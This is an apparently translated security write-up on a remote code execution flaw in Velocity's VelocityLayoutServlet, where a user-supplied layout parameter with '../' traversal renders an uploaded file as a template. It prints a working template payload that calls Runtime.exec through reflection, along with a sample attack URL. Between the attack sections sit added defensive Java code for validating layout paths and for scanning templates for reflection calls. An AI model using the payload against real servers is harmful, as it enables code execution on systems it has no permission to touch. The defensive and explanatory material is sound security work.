VELOCITY Local Code Execution Vulnerability

Source: Internet
Author: User

By empty prodigal heart http://www.inbreak.net
Velocity is the most common presentation-layer template engine in J2EE MVC architectures. Many J2EE applications use it for its good performance, usually in combination with other frameworks, most often Struts2 and Spring MVC.
Template files use the extension "vm", and developers usually need to configure the framework to parse that extension. Velocity officially provides a standard configuration; in the showcase, the servlet that the documentation guides you to configure for vm files is VelocityLayoutServlet.
Any deployment that follows the official Velocity standard is affected by this vulnerability (you can download the showcase in velocity-tools-2.0 and run it directly).

Vulnerability principle:
When using the Velocity framework, developers usually configure the URL mapping so that requests whose extension is vm are parsed as the corresponding Velocity template, which requires a servlet. Velocity provides its own servlets for this purpose; there are two, and the recommended one, used in the official showcase, is VelocityLayoutServlet.
Combined with several tricks, this servlet can be made to execute arbitrary Java code.
Vulnerability entry:
The vulnerability lies in the fact that VelocityLayoutServlet lets the user submit the layout parameter, which specifies the template location.
When this servlet looks for the layout template, it accepts the value submitted as a URL parameter:

    protected String findLayout(HttpServletRequest request)
    {
        // check if an alternate layout has been specified
        // by way of the request parameters
        String layout = request.getParameter(KEY_LAYOUT);

        // also look in the request attributes
        if (layout == null)
        {
            layout = (String)request.getAttribute(KEY_LAYOUT);
        }
        return layout;
    }

From the code we can see that layout is taken from the request parameter, and the servlet's subsequent code uses it to parse the template.
Related code:

mergeTemplate(template, context, response);

Tip 1:
This code does not check whether the template extension is vm. Velocity itself lets you configure the template file extension, so a configuration could tell Velocity to parse html files as templates.
So from the framework's point of view, the official site would only call this a necessary feature.
Tip 2:
Although the Velocity configuration file requires the specified template location to be inside the layout folder, "../" can be used to bypass it:

tools.view.servlet.layout.directory = /layout/

This is a tragedy. If the directory restriction were actually enforced, the vulnerability would have little impact.
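As an added example (not code from this page and not part of the Velocity project), here is how the layout lookup shown above could be hardened: the value of the layout parameter is resolved against the configured tools.view.servlet.layout.directory and refused if it escapes that directory or does not end in .vm, so the servlet falls back to its default layout instead of rendering an arbitrary file. The same check is then reused to audit access-log lines for requests the resolver would refuse. The class and method names, the way the result is combined with the layout directory, and the log line format are assumptions; in a real deployment you would call resolve() from an override of findLayout and return its result.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Validates a user-supplied "layout" value against the configured layout
 * directory before it reaches the template engine. Added example; the class
 * and method names and the access-log format are assumptions.
 */
public final class SafeLayoutResolver {
    private final Path layoutDir;

    /** layoutDir is the value of tools.view.servlet.layout.directory, e.g. "/layout/". */
    public SafeLayoutResolver(String layoutDir) {
        this.layoutDir = Paths.get(layoutDir).normalize();
    }

    /**
     * Returns the layout name relative to the layout directory, or null when the
     * servlet should fall back to its default layout: anything that escapes the
     * directory ("../", absolute paths, NUL bytes) or is not a ".vm" file.
     */
    public String resolve(String requested) {
        if (requested == null || requested.isEmpty()) {
            return null;
        }
        // Treat backslashes as separators so a backslash form of ".." cannot slip past.
        String cleaned = requested.replace('\\', '/');
        if (!cleaned.endsWith(".vm")) {
            return null;                       // Tip 1: the servlet never checks the extension
        }
        Path candidate;
        try {
            candidate = layoutDir.resolve(cleaned).normalize();
        } catch (InvalidPathException e) {
            return null;                       // e.g. an embedded NUL byte
        }
        // Tip 2: after normalisation the path must still be inside the layout directory.
        if (candidate.equals(layoutDir) || !candidate.startsWith(layoutDir)) {
            return null;
        }
        return layoutDir.relativize(candidate).toString().replace('\\', '/');
    }

    /** Matches the layout query parameter inside a logged request line. */
    private static final Pattern LAYOUT_PARAM =
            Pattern.compile("[?&]layout=([^& \"]*)", Pattern.CASE_INSENSITIVE);

    /**
     * True when the logged request carries a layout value the resolver would
     * refuse: a cheap signal for hunting traversal attempts in access logs.
     */
    public boolean isSuspiciousRequest(String logLine) {
        Matcher m = LAYOUT_PARAM.matcher(logLine);
        if (!m.find()) {
            return false;
        }
        String value;
        try {
            value = URLDecoder.decode(m.group(1), "UTF-8");
        } catch (UnsupportedEncodingException | IllegalArgumentException e) {
            return true;                       // malformed encoding is itself worth a look
        }
        return resolve(value) == null;
    }

    public static void main(String[] args) {
        SafeLayoutResolver resolver = new SafeLayoutResolver("/layout/");
        String[] inputs = { "default.vm", "sub/page.vm", "sub/../page.vm",
                            "../z.gif", "../evil.vm", "/WEB-INF/web.vm", "..\\evil.vm" };
        for (String in : inputs) {
            System.out.println(in + " -> " + resolver.resolve(in));
        }
        // Constructed access-log lines in combined-log format.
        String[] log = {
            "10.0.0.5 - - [01/Jan/2013:10:00:00 +0000] \"GET /showcase/context.vm?layout=default.vm HTTP/1.1\" 200 512",
            "10.0.0.9 - - [01/Jan/2013:10:00:01 +0000] \"GET /showcase/context.vm?layout=../z.gif HTTP/1.1\" 200 512",
            "10.0.0.9 - - [01/Jan/2013:10:00:02 +0000] \"GET /showcase/context.vm?layout=..%2F..%2Fz.gif HTTP/1.1\" 200 512"
        };
        for (String line : log) {
            System.out.println((resolver.isSuspiciousRequest(line) ? "ALERT " : "ok    ") + line);
        }
    }
}
```

Only "default.vm", "sub/page.vm" and "sub/../page.vm" survive; every traversal, absolute path and non-.vm name yields null, and the two log lines carrying "../" (raw and percent-encoded) are flagged. Because the servlet silently falls back to the default layout when the layout is missing, the server-side error log is the other place this activity shows up; checking the access log as above gives the same signal without relying on the template lookup failing.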
Tip 3:
Let's skip this one for now. The next framework vulnerability write-up will cover something everyone is familiar with, but which is still tricky.
Tip 4:
When a Velocity template is parsed, it is allowed to access a great deal; you can think of it as an upgraded JSP, including the ability to execute system commands.
Yes, I did not find this on Google. Someone has mentioned it. I discovered it by accident last year (maybe the experts just never said it).
I wrote a simple demo that uses Velocity's ability to execute Java code to run a system command.

#set ($exec = "kxlzx")$exec.class.forName("java.lang.Runtime").getRuntime().exec("calc")

The principle is to define a variable named $exec. The variable holds an ordinary Java object, which inherits from Object, so Object's methods can be called on it; one of its accessible properties is class, through which reflection is possible. I like this feature and have applied it to Java framework vulnerabilities countless times. This way, you can work step by step to the place where system commands can be executed.
Limit 1 (a file must be uploaded):
Obviously, this is not what anyone wants to see. The local file to be executed must be inside the web directory, because Velocity has pinned the template directory down since its early versions, so vm templates can only be loaded from the web directory.
Therefore a file must be uploaded, whatever its extension.
Limit 2 (how to discover it from outside):
This is harder. If the layout is not found, that is, the attacker specifies a non-existent layout, an error is written to the log but nothing is returned to the user.
The user sees a normal 200 page: when the layout is wrong, the default layout is used, so from the outside the result is the same as a page requested without this parameter. The only thing that can be determined is that a URL with the vm extension is very likely affected (other extensions can be configured, as mentioned above).
I won't discuss the rest here; I will post a web framework fingerprinting article on this topic.
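As an added example (not the page's code and not part of Velocity), this is the kind of check a defender can run over files that land in the web root, since Limit 1 means the attacker's template has to be uploaded there: it flags template text that reaches java.lang.Class through the class property or getClass(), or that calls forName(), getRuntime() or newInstance(). The class name, method names and the sample templates are constructed for the example.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Flags Velocity template text that reaches java.lang.Class through a
 * reference ($ref.class or getClass()) or calls into the runtime. Added
 * example; the class name, method names and sample templates are assumptions.
 */
public final class TemplateReflectionScanner {

    /** Each row: a human-readable name and the regular expression that spots it. */
    private static final String[][] SIGNATURES = {
        { "class property on a reference", "\\$!?\\{?\\w+\\}?\\s*\\.\\s*class\\b" },
        { "getClass() call",               "\\.\\s*getClass\\s*\\(" },
        { "Class.forName() call",          "\\.\\s*forName\\s*\\(" },
        { "Runtime.getRuntime() call",     "\\.\\s*getRuntime\\s*\\(" },
        { "reflective newInstance() call", "\\.\\s*newInstance\\s*\\(" },
        { "ProcessBuilder reference",      "\\bProcessBuilder\\b" }
    };

    private static final Pattern[] COMPILED = compileAll();

    private static Pattern[] compileAll() {
        Pattern[] out = new Pattern[SIGNATURES.length];
        for (int i = 0; i < SIGNATURES.length; i++) {
            out[i] = Pattern.compile(SIGNATURES[i][1]);
        }
        return out;
    }

    /** Returns one finding per (line, signature) hit; an empty list means nothing was spotted. */
    public static List<String> scan(String template) {
        List<String> findings = new ArrayList<String>();
        String[] lines = template.split("\\r?\\n", -1);
        for (int n = 0; n < lines.length; n++) {
            for (int i = 0; i < COMPILED.length; i++) {
                Matcher m = COMPILED[i].matcher(lines[n]);
                if (m.find()) {
                    findings.add("line " + (n + 1) + ": " + SIGNATURES[i][0]
                                 + " near '" + m.group() + "'");
                }
            }
        }
        return findings;
    }

    public static boolean isSuspicious(String template) {
        return !scan(template).isEmpty();
    }

    public static void main(String[] args) {
        // Constructed samples: an ordinary page template, and a file of the kind
        // described above (the reference chain from the write-up, without the exec call).
        String benign = "#set($title = \"Welcome\")\n"
                      + "<h1>$title</h1>\n"
                      + "#foreach($u in $users)<li>$u.name ($u.classroom)</li>#end";
        String uploaded = "#set ($exec = \"kxlzx\")\n"
                        + "$exec.class.forName(\"java.lang.Runtime\").getRuntime()";
        System.out.println("benign   -> " + scan(benign));
        System.out.println("uploaded -> " + scan(uploaded));
    }
}
```

The benign template produces no findings (note that "$u.classroom" is not mistaken for the class property, because the pattern requires a word boundary after "class"), while the uploaded sample is reported three times on its second line. This is a file-level complement to the engine-level control: Velocity ships org.apache.velocity.util.introspection.SecureUberspector, selected through the runtime.introspector.uberspect property, which refuses the getClass and class route at render time, so a template that slips past the scanner still cannot reach Class.forName.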

Attack example:
Take the official Velocity showcase as an example.
If the attacker can upload a file to the web directory, such as
z.gif:

#set ($exec = "kxlzx")$exec.class.forName("java.lang.Runtime").getRuntime().exec("calc")hacked by kxlzx<br>http://www.bkjia.com/

Then access: http://www.bkjia.com/showcase/context.vm?layout=../z.gif

You can see:
